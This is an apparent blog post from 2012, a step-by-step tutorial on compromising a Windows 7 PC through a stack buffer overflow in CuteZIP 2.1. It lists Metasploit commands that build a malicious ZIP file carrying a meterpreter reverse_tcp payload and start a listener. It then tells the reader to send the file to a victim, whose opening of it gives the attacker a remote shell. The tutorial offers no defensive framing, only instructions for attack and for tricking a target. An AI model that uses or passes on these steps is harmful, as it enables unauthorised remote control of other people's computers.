Warung Online
Headlines News :
mas template
Home » , » Hack Remote Windows 7 PC using global SCAPE CuteZIP Stack Buffer Overflow

Hack Remote Windows 7 PC using global SCAPE CuteZIP Stack Buffer Overflow

Written By Trik Cari Duit on Rabu, 15 Agustus 2012 | 01.59

This module exploits stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.

Exploit Targets
CuteZIP 2.1

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/cutezip_bof
msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (cutezip_bof)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (cutezip_bof)>exploit  


After we successfully generate the malicious ZIP File, it will stored on your local computer
/root/.msf4/local/msf.zip


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.zip files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger